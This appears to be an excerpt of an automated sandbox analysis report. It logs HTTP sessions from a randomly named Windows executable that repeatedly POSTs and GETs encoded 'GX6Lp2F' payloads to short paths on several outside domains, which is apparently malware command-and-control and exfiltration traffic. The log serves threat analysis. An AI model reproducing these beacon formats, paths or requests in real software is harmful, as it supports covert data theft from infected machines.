                                                                            Data Ascii: GX6Lp2F=gWg0hdzfwUNWFbFgUwh3aotObdaEbruu5t9Mngxis/RVB59TmYazWCY3E3oz697jOQpW2vyU1j4l2MMxeWQKKTaLill83SrNIHPtwcUQT/Wt2pFS2Iq4kVQ2jnrY8dP4X2YK7LlZJv1XrEy9Ev5cy5CappaMRCtTLimW96/0AQzedNZkg0KsOTchju4S6cvWCk9w6WDnXp4kfeGTN+fCbq55pn8H+ub31S1+GXQhnvoV3ygKDWbuwOMdxhq9DAfQEoMjzOcjtFFNMCLj1K4fhG3LJ2g88Ymh2vjMpGRSnnpoEeIh/q31r1LtdLt3ebMgM2mQHa+ye4FChMl9PgzxvqTG3siRapeUr906RkfUcBYFS5GKLi509MuWTumogT1awVNxu+MsEQ4UJHR/0Ni6W39MpegrIvM6peMhjg0PDoLmg9iU+bcerO0HDyn6PzeOlmqTUz441Gs2pdjiD9z5/fzx2DEaGbTwmf4zLRsbrTocTVU4U3g91Yct0w0/Ajz4ueTyWEc8g9rHfmsgFBPVOglnw+xyenVxNAsvTJjaISlSUdTjE46OUofi7MyD18Ac7RyrCOo1stclleS7zxu8BVStTfMoxzlJZ+YSG+SpOJ33LAfVyfbi4WN/inGfhpq9RC4OcMLN4BVThRPcNNF22311mVF1hpOgDUv4bh4Ud/Y/u7QfJ/rpswk6KV8OWUCGef67cK67hwrHYWt1U44yo2QbUmcJhRFvqwjOM/WCXijdDvKS+pG0usO4xQk5+fYo4+W2M78n1Vhxn2Ish1EQTFPEsBOMcToxMDwseFhURQG3rq6gbeLQv5YeDo4AcPdJ09CcEhRClaw3XkFySHagZWlGcd2DZEwBOhA/ZGMm1KLU/Yyhf/5SqA8Ucz3ggCyQiPDfL//lV06jNwHwrI0s9hRmVY21v3fdxYmDnWN871NVKXeHNzixyrACRSVnsIlHSdyqu1Xb2Xu0/Ly82YunvR/GpuK6m+MCPKlVw1QOEOHM [TRUNCATED]
                                                                            Nov 24, 2024 08:24:01.939541101 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:24:01 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:24:01.939558983 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.1050009107.167.84.42804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:03.379560947 CET422OUTGET /rjvg/?GX6Lp2F=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MhCYnHJ28VWxL0fj0Y8TMYCyxad2qg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.cssa.auction
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:24:04.614799023 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Sun, 24 Nov 2024 07:24:04 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                            Nov 24, 2024 08:24:04.614813089 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.1050010209.74.77.109804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:10.379699945 CET688OUTPOST /4r26/ HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.moviebuff.info
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.moviebuff.info/4r26/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 55 35 41 72 59 2f 47 53 42 34 73 75 54 41 66 66 2b 44 64 67 41 79 59 38 61 44 4a 59 42 64 75 57 74 30 53 73 5a 69 6f 62 61 4f 46 69 42 61 35 74 66 72 4b 41 42 32 6d 30 34 46 72 61 39 4e 71 63 71 6a 43 55 32 4a 6c 70 53 61 45 6b 45 51 57 57 56 42 44 61 41 2f 4a 42 6c 30 50 6c 36 49 53 39 56 75 74 66 68 42 55 71 48 43 4a 32 77 57 4e 2b 4c 4a 72 72 67 4f 31 65 6f 36 6a 6c 50 54 74 2b 42 70 55 31 59 33 66 63 33 32 50 79 52 36 62 65 51 6f 4d 32 36 32 59 45 61 4b 33 2f 42 7a 49 71 69 36 74 6c 41 65 36 6e 52 4f 4b 52 64 6d 49 67
                                                                            Data Ascii: GX6Lp2F=3PGUoE7TzLvmU5ArY/GSB4suTAff+DdgAyY8aDJYBduWt0SsZiobaOFiBa5tfrKAB2m04Fra9NqcqjCU2JlpSaEkEQWWVBDaA/JBl0Pl6IS9VutfhBUqHCJ2wWN+LJrrgO1eo6jlPTt+BpU1Y3fc32PyR6beQoM262YEaK3/BzIqi6tlAe6nROKRdmIg
                                                                            Nov 24, 2024 08:24:11.589339018 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:11 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.1050011209.74.77.109804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:13.058130026 CET712OUTPOST /4r26/ HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.moviebuff.info
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.moviebuff.info/4r26/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 57 59 77 72 4c 6f 53 53 56 6f 73 76 50 77 66 66 78 6a 64 6b 41 79 55 38 61 42 6b 48 64 2f 36 57 74 55 43 73 59 6e 45 62 64 4f 46 69 4b 36 35 6b 62 72 4b 31 42 32 69 6a 34 45 58 61 39 4e 75 63 71 6d 2b 55 33 2b 35 6f 49 71 45 6d 4e 77 57 59 49 78 44 61 41 2f 4a 42 6c 30 79 4b 36 49 71 39 56 65 39 66 7a 31 67 74 4b 69 4a 31 34 32 4e 2b 63 35 72 76 67 4f 31 38 6f 37 4f 77 50 52 6c 2b 42 72 4d 31 5a 6c 6e 64 2b 32 50 38 4d 71 62 4c 63 4b 68 69 34 45 73 70 66 59 7a 38 66 31 73 71 6f 37 51 69 52 50 62 77 43 35 57 66 54 67 39 4b 5a 35 46 51 52 66 36 68 74 51 34 2b 78 2b 67 46 56 42 6b 47 4f 41 3d 3d
                                                                            Data Ascii: GX6Lp2F=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/6WtUCsYnEbdOFiK65kbrK1B2ij4EXa9Nucqm+U3+5oIqEmNwWYIxDaA/JBl0yK6Iq9Ve9fz1gtKiJ142N+c5rvgO18o7OwPRl+BrM1Zlnd+2P8MqbLcKhi4EspfYz8f1sqo7QiRPbwC5WfTg9KZ5FQRf6htQ4+x+gFVBkGOA==
                                                                            Nov 24, 2024 08:24:14.316293001 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:14 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.1050012209.74.77.109804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:15.723871946 CET1725OUTPOST /4r26/ HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.moviebuff.info
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.moviebuff.info/4r26/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 57 59 77 72 4c 6f 53 53 56 6f 73 76 50 77 66 66 78 6a 64 6b 41 79 55 38 61 42 6b 48 64 2f 69 57 74 6e 61 73 5a 45 38 62 63 4f 46 69 44 61 35 68 62 72 4b 73 42 79 50 4c 34 45 62 67 39 50 47 63 71 41 4b 55 2f 71 4e 6f 64 36 45 6d 41 51 57 5a 56 42 44 50 41 2f 5a 46 6c 30 43 4b 36 49 71 39 56 64 56 66 78 68 55 74 49 69 4a 32 77 57 4e 36 4c 4a 72 54 67 4f 74 47 6f 37 4c 4c 50 67 46 2b 43 4c 63 31 65 51 7a 64 2f 57 50 70 50 71 61 4f 63 4b 74 55 34 45 77 74 66 5a 58 53 66 79 41 71 71 4f 39 71 57 73 72 4c 58 50 32 58 55 78 64 4f 4c 73 74 37 54 65 54 53 72 53 45 48 69 50 74 4e 64 42 46 2b 56 51 37 53 53 37 4a 6c 74 54 7a 64 67 49 32 37 4e 76 4c 61 47 66 2b 2b 47 37 6a 30 57 75 51 67 33 42 55 34 35 48 2b 74 30 43 43 75 30 5a 4e 77 61 33 6d 6e 56 41 78 32 4f 49 4f 34 7a 56 64 34 48 65 47 32 64 43 6c 5a 6b 75 35 6d 76 62 77 71 59 67 48 48 5a 42 42 67 4c 4e 47 6f 58 59 45 6e 57 35 2b 5a 67 62 59 49 49 70 57 62 46 32 70 32 51 75 63 66 76 36 4b 59 35 43 [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/iWtnasZE8bcOFiDa5hbrKsByPL4Ebg9PGcqAKU/qNod6EmAQWZVBDPA/ZFl0CK6Iq9VdVfxhUtIiJ2wWN6LJrTgOtGo7LLPgF+CLc1eQzd/WPpPqaOcKtU4EwtfZXSfyAqqO9qWsrLXP2XUxdOLst7TeTSrSEHiPtNdBF+VQ7SS7JltTzdgI27NvLaGf++G7j0WuQg3BU45H+t0CCu0ZNwa3mnVAx2OIO4zVd4HeG2dClZku5mvbwqYgHHZBBgLNGoXYEnW5+ZgbYIIpWbF2p2Qucfv6KY5CvSH/4sEJwnz8NLfs1bkjzAA3/6zNOVSJx/zNU8wb4Cgcvl65hifR+ZCw0ROIMwvIHxW1Zslq6fcdcM9h0ZEO8CmCLPJ42sdW0jZZmETKShMO5pnMGAGGSfeq+rbRgaAHPJVkJsYzNMaPrtMVSrQKZaKvO+EkbGWNkI4qvlSkJv3vgAacAWd/jMRwHCzw7ZSOBKaSXzTISVxFxr30eYbHM4h+KkzAWIRnOkHd02iTyhLBKc1alULr9SoH4CM9vdiuMc7z44w9yES8iEVY5cGNRg42JOHg7Pouq9QHNz9XTN0J+YCFW6jkgUXCRniQTPEieqtx0clu/If0Gl0bKUHXQ94wjmBoVKA/jQlFjsigGh3aYFlESMgfX1ipQxTatt1k2LBFhr8eMbsM7J6PvY9tFHiK7KHcmTkH+oeMBo4Uzt+RxoYD/pIew1eT+iLm75nLrRIhR8Q5JoO+dMCMFdGNhL+M7W1gqnX73Q5g7qjVNTdpx7+DBPqq8Qk6bwWjXieMvisSVpYqn07wHW3Allb42MqtZIJ4xA1lSg0jJ6r0COPjmZyN0NrqzmIaVoK5ExxwegKishKOiSK97U0QuyrSfC802GVfwEOoB3nMSzYUYEsDYzTVhJwH/nbN++/2MXp6H4t6ZdLY9zu5QbVrw/BdjhyBCsfgjCVtz7 [TRUNCATED]
                                                                            Nov 24, 2024 08:24:16.977004051 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:16 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.1050013209.74.77.109804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:18.390542030 CET424OUTGET /4r26/?H8=BpFD-28hKhrD&GX6Lp2F=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80eqplMgmGVUTbCPRmhwbXi4X3f8N+iA== HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:24:19.666932106 CET548INHTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:19 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.1050014199.59.243.227804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:25.535521984 CET688OUTPOST /rfcw/ HTTP/1.1
                                                                            Host: www.whisperart.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
